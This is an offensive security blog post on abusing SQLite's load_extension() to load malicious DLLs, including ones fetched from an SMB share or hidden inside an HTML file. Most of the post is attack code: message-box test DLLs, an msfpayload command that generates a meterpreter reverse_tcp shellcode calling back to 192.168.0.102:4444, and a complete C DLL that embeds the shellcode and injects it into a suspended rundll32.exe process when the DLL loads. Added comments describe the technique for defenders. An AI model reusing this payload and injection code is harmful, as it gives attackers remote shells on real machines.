Fun with SQLite Load_Extension

What is load_extension?

This interface loads an SQLite extension library from the named file.

int sqlite3_load_extension(
sqlite3 *db, /* Load the extension into this database connection */
const char *zFile, /* Name of the shared library containing extension */
const char *zProc, /* Entry point. Derived from zFile if 0 */
char **pzErrMsg /* Put error message here if not 0 */
);

More information: https://www.sqlite.org/c3ref/load_extension.html
You can use this function to load a SQLite extension. However, extension loading is turned off by default (see sqlite3_enable_load_extension()) to prevent it from being abused in SQL injection attacks. You can read more here: https://www.sqlite.org/c3ref/enable_load_extension.html
The SQL syntax is:

select load_extension('path\dll', 'EP');

However, this path (const char *zFile) can also point to an SMB share.

Custom DLLs

We can of course code our own malicious DLLs and execute our own malicious code.

#include <windows.h>
/*
 * Author: @OsandaMalith 
 * Website: http://osandamalith.com
 */
/*
 * DllMain: the DLL's entry point. Shows a message box when the DLL is
 * attached to a process; thread attach/detach and process detach all fall
 * into one shared warning box. Always returns TRUE.
 *
 * Note for defenders: on Windows this runs as soon as the library is mapped
 * into the host process, independently of whichever zProc entry point the
 * load_extension() caller names.
 */
BOOL WINAPI DllMain (
            HANDLE    hinstDLL,    /* module handle of this DLL (unused) */
            DWORD     fdwReason,   /* why the entry point was invoked */
            LPVOID    lpvReserved) /* unused */
{
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:  
            MessageBox(0, "You got pwned", "@OsandaMalith", MB_OK | MB_ICONERROR);
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
             /* all three remaining reasons share this one message box */
             MessageBox(0, "Unloading DLL", "@OsandaMalith", MB_OK | MB_ICONWARNING);
        break;
    }
    return TRUE;
}
 
/*
 * hello: the routine named as the zProc entry point in the load_extension()
 * calls shown in the text. Only shows a message box. Declared int but has no
 * return statement, so the value the caller receives is indeterminate.
 */
int hello() {
    MessageBox(0, "Just Kidding :)", "@OsandaMalith", MB_OK | MB_ICONINFORMATION);
}

We can also use MASM32 to code the DLL which will be extremely small in size.

.386
; Author: @OsandaMalith
; Website: http://osandamalith.com
;
; Minimal 32-bit flat/stdcall DLL that only shows message boxes: one per
; DllEntry reason code, and one from the hello proc.
.MODEL flat,stdcall
OPTION CASEMAP:NONE
Include windows.inc
Include user32.inc
Include kernel32.inc
IncludeLib user32.lib
IncludeLib kernel32.lib
.DATA
; NUL-terminated strings used as MessageBox title (AppName) and bodies
AppName db "DLL Skeleton",0
HelloMsg db "Just Kidding :)",0
LoadMsg db "You got Pwned!",0
UnloadMsg db "The DLL is unloaded",0
ThreadCreated db "A thread is created in this process",0
ThreadDestroyed db "A thread is destroyed in this process",0
.code
; DllEntry: DLL entry point. Picks a message by the reason code, then
; returns TRUE in eax. Runs when the library is mapped, before any named
; entry point is called.
DllEntry proc hInstance:HINSTANCE, reason:DWORD, reserved1:DWORD
.if reason==DLL_PROCESS_ATTACH
invoke MessageBox,NULL,addr LoadMsg,addr AppName,MB_OK + MB_ICONERROR + MB_RTLREADING
.elseif reason==DLL_PROCESS_DETACH
invoke MessageBox,NULL,addr UnloadMsg,addr AppName,MB_OK + MB_ICONWARNING
.elseif reason==DLL_THREAD_ATTACH
invoke MessageBox,NULL,addr ThreadCreated,addr AppName,MB_OK
.else
; any other reason code (DLL_THREAD_DETACH is the remaining documented one)
invoke MessageBox,NULL,addr ThreadDestroyed,addr AppName,MB_OK
.endif
mov eax,TRUE
ret
DllEntry Endp
; hello: the routine named as the load_extension() entry point in the text
hello proc
invoke MessageBox,NULL,addr HelloMsg,addr AppName,MB_OK + MB_ICONINFORMATION + MB_RTLREADING
ret
hello endp
; DllEntry is the module's entry point
End DllEntry

HTML + DLL

You can check out the drop_and_run project by hasherezade https://github.com/hasherezade/snippets/tree/master/drop_and_run
demo.html is a file that has our DLL embedded within HTML comments.
So we can embed our malicious DLL code inside a HTML file 🙂

select load_extension('\\192.168.0.100\WinAsm\dll\cdll.html','hello');

Shellcode + GameOver

We can use shellcode and compile our own DLL. For this example I’m using a meterpreter reverse tcp shellcode.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.102 LPORT=4444 R| msfencode -e x86/shikata_ga_nai -b '\x00\x0A\x0D' -t c
#include <windows.h>
/*
 * Website: http://osandamalith.com
 */
/*
 * Opaque shellcode blob. The text above attributes it to a Metasploit
 * windows/meterpreter/reverse_tcp payload encoded with shikata_ga_nai; the
 * bytes themselves cannot be reviewed here and should be treated as
 * untrusted. The array is SCSIZE (2048) bytes: only the initialised prefix
 * is payload, the rest is zero-filled by aggregate initialisation, and
 * boom() below copies the full SCSIZE bytes regardless.
 */
#define SCSIZE 2048
unsigned char code[SCSIZE] = 
"\xb8\xdc\x16\x51\xba\xdb\xd0\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x49\x83\xc5\x04\x31\x45\x10\x03\x45\x10\x3e\xe3\xad\x52\x37"
"\x0c\x4e\xa3\x27\x84\xab\x92\x75\xf2\xb8\x87\x49\x70\xec\x2b"
"\x22\xd4\x05\xbf\x46\xf1\x2a\x08\xec\x27\x04\x89\xc1\xe7\xca"
"\x49\x40\x94\x10\x9e\xa2\xa5\xda\xd3\xa3\xe2\x07\x1b\xf1\xbb"
"\x4c\x8e\xe5\xc8\x11\x13\x04\x1f\x1e\x2b\x7e\x1a\xe1\xd8\x34"
"\x25\x32\x70\x43\x6d\xaa\xfa\x0b\x4e\xcb\x2f\x48\xb2\x82\x44"
"\xba\x40\x15\x8d\xf3\xa9\x27\xf1\x5f\x94\x87\xfc\x9e\xd0\x20"
"\x1f\xd5\x2a\x53\xa2\xed\xe8\x29\x78\x78\xed\x8a\x0b\xda\xd5"
"\x2b\xdf\xbc\x9e\x20\x94\xcb\xf9\x24\x2b\x18\x72\x50\xa0\x9f"
"\x55\xd0\xf2\xbb\x71\xb8\xa1\xa2\x20\x64\x07\xdb\x33\xc0\xf8"
"\x79\x3f\xe3\xed\xfb\x62\x6c\xc1\x31\x9d\x6c\x4d\x42\xee\x5e"
"\xd2\xf8\x78\xd3\x9b\x26\x7e\x14\xb6\x9e\x10\xeb\x39\xde\x39"
"\x28\x6d\x8e\x51\x99\x0e\x45\xa2\x26\xdb\xc9\xf2\x88\xb4\xa9"
"\xa2\x68\x65\x41\xa9\x66\x5a\x71\xd2\xac\xf3\x1b\x28\x27\x3c"
"\x73\x32\xd1\xd4\x81\x33\x0c\x79\x0c\xd5\x44\x91\x58\x4d\xf1"
"\x08\xc1\x05\x60\xd4\xdc\x63\xa2\x5e\xd2\x94\x6d\x97\x9f\x86"
"\x1a\x57\xea\xf5\x8d\x68\xc1\x90\x31\xfd\xed\x32\x65\x69\xef"
"\x63\x41\x36\x10\x46\xd9\xff\x84\x29\xb6\xff\x48\xaa\x46\x56"
"\x02\xaa\x2e\x0e\x76\xf9\x4b\x51\xa3\x6d\xc0\xc4\x4b\xc4\xb4"
"\x4f\x23\xea\xe3\xb8\xec\x15\xc6\x38\xd1\xc3\x2f\xbf\x23\x66"
"\x5c\x03";

/*
 * inline_bzero: write l zero bytes starting at p, one byte per iteration.
 * Hand-rolled instead of memset(); the listing gives no reason.
 * NOTE(review): presumably to avoid a CRT import — unconfirmed.
 */
void inline_bzero(void *p, size_t l)
{
    
           BYTE *q = (BYTE *)p;
           size_t x = 0;
           for (x = 0; x < l; x++)
                     *(q++) = 0x00;
}
 
void boom(void);
 
/*
 * DllMain: DLL entry point. On DLL_PROCESS_ATTACH it calls boom(), i.e. the
 * payload fires at load time, before SQLite calls any named entry point.
 * Because boom() ends in ExitThread(), the break and the return TRUE below
 * are never reached on that path. All other reasons do nothing.
 */
BOOL WINAPI
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
    switch (dwReason)
    {
        case DLL_PROCESS_ATTACH:
            boom();   /* does not return: boom() calls ExitThread(0) */
            break;
 
        case DLL_PROCESS_DETACH:
            break;
 
        case DLL_THREAD_ATTACH:
            break;
 
        case DLL_THREAD_DETACH:
            break;
    }
    return TRUE;
}
 
/*
 * boom: the payload. Starts rundll32.exe suspended, copies the code[] buffer
 * into that process at a freshly allocated RWX region, points the suspended
 * primary thread's instruction pointer at it, resumes it, then ends the
 * calling thread.
 *
 * Defender's note: CreateProcess(CREATE_SUSPENDED) + VirtualAllocEx with
 * PAGE_EXECUTE_READWRITE + WriteProcessMemory + SetThreadContext +
 * ResumeThread is the well-known suspended-thread hijack sequence and a
 * standard endpoint-telemetry signature. The observable artefact is a
 * rundll32.exe child of the process hosting SQLite (here spawned from
 * DllMain); the reverse_tcp payload the text names would then make the
 * outbound connection. None of the API return values after CreateProcess
 * are checked.
 */
void boom(void) {
    int error;               /* unused */
    PROCESS_INFORMATION pi;  /* handles/ids of the child process and thread */
    STARTUPINFO si;
    CONTEXT ctx;             /* register state of the suspended thread */
    DWORD prot;              /* unused */
   LPVOID ep;                /* address of the injected buffer in the child */

    inline_bzero( &si, sizeof( si ));
    si.cb = sizeof(si);
 
    /* child starts suspended so its first instruction can be replaced */
    if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
        /* request the register sets that include the instruction pointer */
        ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
        GetThreadContext(pi.hThread, &ctx);
 
       ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 
        /* copies the whole SCSIZE-byte array, not just the initialised prefix */
        WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
 
/* instruction-pointer field differs by target architecture */
#ifdef _WIN64
       ctx.Rip = (DWORD64)ep;
#else
       ctx.Eip = (DWORD)ep;
#endif
 
        SetThreadContext(pi.hThread,&ctx);
 
        ResumeThread(pi.hThread);
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
   /* never returns; since boom() is called from DllMain, the thread that
      loaded this DLL ends here */
   ExitThread(0);
}

Mentions:
https://rinige.com/index.php/archives/538/
